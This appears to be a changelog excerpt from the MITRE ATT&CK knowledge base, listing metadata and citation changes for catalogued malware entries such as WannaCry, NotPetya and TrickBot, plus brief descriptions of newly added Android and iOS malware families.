external_references[4]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[5]['source_name']FireEye APT28 January 2017Securelist Sofacy Feb 2018
external_references[5]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[5]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[6]['source_name']Securelist Sofacy Feb 2018Sofacy
external_references[6]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.This designation has been used in reporting both to refer to the threat group ([APT28](https://attack.mitre.org/groups/G0007)) and its associated malware.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018)
x_mitre_attack_spec_version2.1.03.1.0

[S0144] ChChes

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:49:40.093000+00:002023-03-23 15:14:18.599000+00:00
external_references[4]['source_name']Palo Alto menuPass Feb 2017Twitter Nick Carr APT10
external_references[4]['description']Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.Carr, N.. (2017, April 6). Retrieved June 29, 2017.
external_references[4]['url']http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/https://twitter.com/ItsReallyNick/status/850105140589633536
external_references[5]['source_name']JPCERT ChChes Feb 2017FireEye APT10 April 2017
external_references[5]['description']Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
external_references[5]['url']http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.htmlhttps://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
external_references[6]['source_name']PWC Cloud Hopper Technical Annex April 2017Palo Alto menuPass Feb 2017
external_references[6]['description']PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
external_references[6]['url']https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdfhttp://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/
external_references[7]['source_name']FireEye APT10 April 2017JPCERT ChChes Feb 2017
external_references[7]['description']FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.htmlhttp://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html
external_references[8]['source_name']Twitter Nick Carr APT10PWC Cloud Hopper Technical Annex April 2017
external_references[8]['description']Carr, N.. (2017, April 6). Retrieved June 29, 2017.PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
external_references[8]['url']https://twitter.com/ItsReallyNick/status/850105140589633536https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0608] Conficker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:15:47.458000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0591] ConnectWise

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-03-18 14:54:01.053000+00:002023-04-13 13:09:38.786000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0115] Crimson

Current version: 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-22 18:16:11.378000+00:002023-03-26 18:39:01.095000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0021] Derusbi

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 15:04:10.654000+00:002023-03-20 22:03:44.668000+00:00
external_references[5]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0038] Duqu

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:17:50.971000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0605] EKANS

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-11 14:00:00.188000+00:002023-03-08 22:04:48.834000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0152] EvilGrab

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:22:54.155000+00:002023-03-23 15:14:18.597000+00:00
external_references[1]['url']https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdfhttps://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0061] HDoor

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2019-04-25 02:33:53.419000+00:002023-04-04 20:20:59.961000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0009] Hikit

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-01-12 16:21:44.692000+00:002023-03-20 22:03:44.668000+00:00
external_references[1]['source_name']Novetta-AxiomFireEye Hikit Rootkit
external_references[1]['description']Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.
external_references[1]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
external_references[2]['source_name']FireEye Hikit RootkitNovetta-Axiom
external_references[2]['description']Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.htmlhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0203] Hydraq

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 14:57:44.182000+00:002023-03-20 22:03:44.662000+00:00
external_references[16]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0387] KeyBoy

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:04:15.433000+00:002023-03-23 15:22:36.377000+00:00
external_references[2]['source_name']CitizenLab KeyBoy Nov 2016Rapid7 KeyBoy Jun 2013
external_references[2]['description']Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
external_references[2]['url']https://citizenlab.ca/2016/11/parliament-keyboy/https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/
external_references[3]['source_name']PWC KeyBoys Feb 2017CitizenLab KeyBoy Nov 2016
external_references[3]['description']Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.
external_references[3]['url']https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.htmlhttps://citizenlab.ca/2016/11/parliament-keyboy/
external_references[4]['source_name']Rapid7 KeyBoy Jun 2013PWC KeyBoys Feb 2017
external_references[4]['description']Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
external_references[4]['url']https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html
x_mitre_attack_spec_version2.1.03.1.0

[S0607] KillDisk

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-11 14:00:00.188000+00:002023-03-08 22:13:42.357000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0372] LockerGoga

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-23 21:22:58.477000+00:002023-03-08 22:03:50.370000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0508] Ngrok

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 19:49:28.441000+00:002023-04-13 13:24:56.579000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0368] NotPetya

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:11:21.842000+00:00
external_references[4]['source_name']PetrwrapNyetya
external_references[4]['description'](Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)(Citation: Talos Nyetya June 2017)
external_references[5]['source_name']NyetyaPetrwrap
external_references[5]['description'](Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)
external_references[6]['source_name']Talos Nyetya June 2017ESET Telebots June 2017
external_references[6]['description']Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.
external_references[6]['url']https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.htmlhttps://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
external_references[7]['source_name']US-CERT NotPetya 2017Talos Nyetya June 2017
external_references[7]['description']US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
external_references[7]['url']https://www.us-cert.gov/ncas/alerts/TA17-181Ahttps://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
external_references[8]['source_name']ESET Telebots June 2017US District Court Indictment GRU Unit 74455 October 2020
external_references[8]['description']Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[8]['url']https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/https://www.justice.gov/opa/press-release/file/1328521/download
external_references[9]['source_name']US District Court Indictment GRU Unit 74455 October 2020US-CERT NotPetya 2017
external_references[9]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.
external_references[9]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.us-cert.gov/ncas/alerts/TA17-181A
x_mitre_attack_spec_version2.1.03.1.0

[S0138] OLDBAIT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-19 23:51:58.976000+00:002023-03-26 17:51:20.402000+00:00
external_references[1]['source_name']FireEye APT28FireEye APT28 January 2017
external_references[1]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[1]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[2]['source_name']FireEye APT28 January 2017FireEye APT28
external_references[2]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[2]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0012] PoisonIvy

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 21:02:39.862000+00:002023-03-20 22:03:44.669000+00:00
external_references[7]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S1040] Rclone

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 15:20:46.871000+00:002023-04-13 13:14:41.257000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0153] RedLeaves

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 21:01:05.439000+00:002023-03-23 15:14:18.594000+00:00
external_references[3]['source_name']PWC Cloud Hopper Technical Annex April 2017Twitter Nick Carr APT10
external_references[3]['description']PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.Carr, N.. (2017, April 6). Retrieved June 29, 2017.
external_references[3]['url']https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdfhttps://twitter.com/ItsReallyNick/status/850105140589633536
external_references[5]['source_name']Twitter Nick Carr APT10PWC Cloud Hopper Technical Annex April 2017
external_references[5]['description']Carr, N.. (2017, April 6). Retrieved June 29, 2017.PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
external_references[5]['url']https://twitter.com/ItsReallyNick/status/850105140589633536https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0332] Remcos

Current version: 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-16 15:40:41.093000+00:002022-12-23 14:07:20.658000+00:00
external_references[4]['url']https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/
x_mitre_attack_spec_version2.1.03.1.0

[S0692] SILENTTRINITY

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 12:01:12.083000+00:002023-04-14 19:27:39.308000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_contributors[0]Daniel Acevedo, BlackbotDaniel Acevedo, @darmad0, ARMADO

[S0266] TrickBot

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-01 14:19:20.660000+00:002023-02-23 19:45:50.419000+00:00
external_references[2]['source_name']TotbrickTSPY_TRICKLOAD
external_references[2]['description'](Citation: Trend Micro Totbrick Oct 2016) (Citation: Microsoft Totbrick Oct 2017)(Citation: Trend Micro Totbrick Oct 2016)
external_references[3]['source_name']TSPY_TRICKLOADTotbrick
external_references[3]['description'](Citation: Trend Micro Totbrick Oct 2016)(Citation: Trend Micro Totbrick Oct 2016) (Citation: Microsoft Totbrick Oct 2017)
external_references[4]['source_name']S2 Grupo TrickBot June 2017Trend Micro Totbrick Oct 2016
external_references[4]['description']Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.
external_references[4]['url']https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdfhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n
external_references[5]['source_name']Fidelis TrickBot Oct 2016IBM TrickBot Nov 2016
external_references[5]['description']Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.
external_references[5]['url']https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyrehttps://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
external_references[6]['source_name']IBM TrickBot Nov 2016TrendMicro Trickbot Feb 2019
external_references[6]['description']Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.
external_references[6]['url']https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/
external_references[8]['source_name']Trend Micro Totbrick Oct 2016Microsoft Totbrick Oct 2017
external_references[8]['description']Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.
external_references[8]['url']https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.nhttps://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick
external_references[9]['source_name']TrendMicro Trickbot Feb 2019Fidelis TrickBot Oct 2016
external_references[9]['description']Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.
external_references[9]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre
external_references[10]['source_name']Microsoft Totbrick Oct 2017S2 Grupo TrickBot June 2017
external_references[10]['description']Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.
external_references[10]['url']https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrickhttps://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0366] WannaCry

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:20:20.868000+00:00
external_references[1]['source_name']WanaCryWanaCrypt0r
external_references[1]['description'](Citation: SecureWorks WannaCry Analysis)(Citation: LogRhythm WannaCry)
external_references[2]['source_name']WanaCryptWCry
external_references[2]['description'](Citation: SecureWorks WannaCry Analysis)(Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)
external_references[3]['source_name']WanaCrypt0rWanaCry
external_references[3]['description'](Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)
external_references[4]['source_name']WCryWanaCrypt
external_references[4]['description'](Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)(Citation: SecureWorks WannaCry Analysis)
external_references[5]['source_name']LogRhythm WannaCryFireEye WannaCry 2017
external_references[5]['description']Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
external_references[5]['url']https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
external_references[6]['source_name']US-CERT WannaCry 2017SecureWorks WannaCry Analysis
external_references[6]['description']US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.
external_references[6]['url']https://www.us-cert.gov/ncas/alerts/TA17-132Ahttps://www.secureworks.com/research/wcry-ransomware-analysis
external_references[8]['source_name']FireEye WannaCry 2017LogRhythm WannaCry
external_references[8]['description']Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.
external_references[8]['url']https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.htmlhttps://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/
external_references[9]['source_name']SecureWorks WannaCry AnalysisUS-CERT WannaCry 2017
external_references[9]['description']Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.
external_references[9]['url']https://www.secureworks.com/research/wcry-ransomware-analysishttps://www.us-cert.gov/ncas/alerts/TA17-132A
x_mitre_attack_spec_version2.1.03.1.0

[S0141] Winnti for Windows

Current version: 3.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 16:38:19.439000+00:002023-03-20 22:02:53.982000+00:00
external_references[5]['url']http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdfhttps://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0388] YAHOYAH

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:23:45.362000+00:002023-03-23 15:24:22.256000+00:00
external_references[1]['url']https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdfhttps://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0672] Zox

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 16:01:23.818000+00:002023-03-20 22:03:44.670000+00:00
external_references[4]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0412] ZxShell

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 15:01:42.835000+00:002023-03-23 15:27:10.501000+00:00
external_references[4]['url']https://content.fireeye.com/apt-41/rpt-apt41https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
x_mitre_attack_spec_version2.1.03.1.0

[S0032] gh0st RAT

Current version: 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 21:03:21.873000+00:002023-03-20 22:03:44.666000+00:00
external_references[5]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0

mobile-attack

New Software

[S1061] AbstractEmu

Current version: 1.0

Description: [AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)


[S1054] Drinik

Current version: 1.0

Description: [Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)


[S1067] FluBot

Current version: 1.0

Description: [FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)


[S1062] S.O.V.A.

Current version: 1.0

Description: [S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for "owl", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)


[S1055] SharkBot

Current version: 1.0

Description: [SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)


[S1069] TangleBot

Current version: 1.0

Description: [TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)


[S1056] TianySpy

Current version: 1.0

Description: [TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122)

Major Version Changes

[S0311] YiSpecter

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[YiSpecter](https://attack.mitre.org/software/S0311) iOS malt1[YiSpecter](https://attack.mitre.org/software/S0311) is a fa
>ware that affects both jailbroken and non-jailbroken iOS dev>mily of iOS and Android malware, first detected in November 
>ices. It is also unique because it abuses private APIs in th>2014, targeting users in mainland China and Taiwan. [YiSpect
>e iOS system to implement functionality. (Citation: PaloAlto>er](https://attack.mitre.org/software/S0311) abuses private 
>-YiSpecter)>APIs in iOS to infect both jailbroken and non-jailbroken dev
 >ices.(Citation: paloalto_yispecter_1015)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_aliases['YiSpecter']
x_mitre_deprecatedFalse
x_mitre_platforms['Android', 'iOS']
external_referenceshttps://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-04-20 18:19:15.826000+00:00
